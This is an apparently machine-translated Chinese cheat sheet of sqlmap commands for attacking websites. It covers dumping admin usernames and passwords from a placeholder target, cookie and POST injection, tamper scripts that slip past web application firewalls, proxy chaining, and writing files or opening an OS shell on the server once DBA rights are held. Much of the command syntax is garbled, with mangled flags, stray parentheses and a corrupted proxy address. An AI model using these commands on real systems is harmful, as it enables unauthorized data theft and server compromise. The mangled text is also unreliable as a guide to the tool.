sqlmap常用命令,sqlmap更新命令

Sqlmap常规命令：

访问(数据库) :

SQL map-u“http://www.XXX.com/show news.ASP？ id=1(-tables (获取表) ) ) ) )。

SQL map-u“http://www.XXX.com/show news.ASP？ id=1”--columns-t表(获取指定表字段的内容) ) ) ) )。

SQL map-u“http://www.XXX.com/show news.ASP？ id=1(-dump-c“管理员，密码”-t表(指定数据下载) ) ) )。

MYSQL (多个数据库) :

SQL map-u“http://www.XXX.com/show news.PHP？ id=1- DBS (数据库获取) ) ) ) ) )

SQL map-u“http://www.XXX.com/show news.ASP？ id=1(-current-db (获取当前网站的数据库) ) ) ) ) ) )。

SQL map-u“http://www.XXX.com/show news.ASP？ id=1” - -tables -D数据库(获取指定的数据库表) ) ) ) ) )。

SQL map-u“http://www.XXX.com/show news.ASP？ id=1(- columns-t“表”-D“库”(获取指定字段的内容) ) ) ) ) ) )。

SQL map-u“http://www.XXX.com/show news.ASP？ id=1”-dump-c“admin，password” -T“表”- d“库”(下载指定数据) ) ) )。

饼干注入： sqlmap-u“http://www.XXX.com/show news.ASP？ ”cookie“id=1”-第2级

开机自检注入：

包括两个方面。 -r参数注入- data参数注入

根据情况选择两者的区别

- r :用burp抓住包，作为1.txt保存在sqlmap根目录中，一般多使用登录框

Sqlmap.py -r “1.txt”

data :可以直接使用参数

SQL map-u“http://www.XXX.com/show news.ASP？ ”data=“id=1”

静态注入：

在有注入的地方加上*，获取数据库

sqlmap.py-u“http://www.xx.com/index.PHP/index/view/id/40 *.html”- DBS

Sqlmap代理：

http(s )代理：

参数：-proxy，-proxy-cred，-proxy-file，-ignore-proxy

使用参数“-proxy”设置格式为http(s ) ://URL :端口的http (代理)。 如果代理需要认证，请使用-proxy-cred参数提供认证证书。 格式为“username:password”。

例如：

SQL map-u“http://www.XXX.com/show news.ASP？ id=1”- DBS- proxy http://192.168.0.133601080

代理文件：加载代理ip列表

例如，sqlmap.py-u“http://www.XXX.com/show news.ASP？ id=1 -proxy-file=dl.txt (代理ip文件) )。

ignore-proxy :忽略本地代理设置

proxy http://local :8080thread S10 (可定制线程加速)代理

因为没有尝试过Tor代理模式：所以不贴语法。

Sqlmap的tamper通过waf脚本进行了组织：

sqlmap有两个选项：-check-waf -identify-waf以识别waf

注：自己常用的脚本

space2morehash.py space2hash.py (过滤‘=’省略；base64encode.py；用base64编码替换) ) ) ) ) ) )。

charencode.pyspace2comment.pycharunicodeencode.py (字符串unicode代码) chardoubleencode.py (双url代码) unmagicquotes.py 拆分) appendnullbyte.py )在有效载荷结束位置加载零字节字符编码) ) ) ) ) ) )。

Tamper语法：

batch :要求不写入目标(有任何提示时默认返回托架) )。

tamper :使用干预脚本

-v3(3为等级) ) ) )。

注：如果不使用级别3，则无法进行下一个操作。

语法： sqlmap.py-u“http://www.XXX.com/show news.ASP？ id=1”- v3- DBS- batch- tamper“space2morehash.py”

注：数据库的tamper脚本(如mysql access )仍然不同

带上与大人物整理的各数据库相对应的tamper脚本链接

3359 blog.csdn.net/hx sstar/article/details/22782627

Sqlmap请求延迟：

sqlmap.py-u“http://www.XXX.com/show news.ASP？ id=1”- tables- delay 0.5 (延迟时间) ) ) ) ) ) ) )。

如果您具有网站dba权限并可以读取写入文件，则可以直接使用OS-shell或以下命令

读取文件读取/主页/www/index.PHP指定文件

文件-写入写入本地文件。 ---文件-写入“c :test1.txt”- -文件- dest“/home/www/feizhu.txt”本地1.txt

sqlmap连接数据库：

sqlmap.py-dmysql ://test : test @ localhost 33603306/testSQL-shell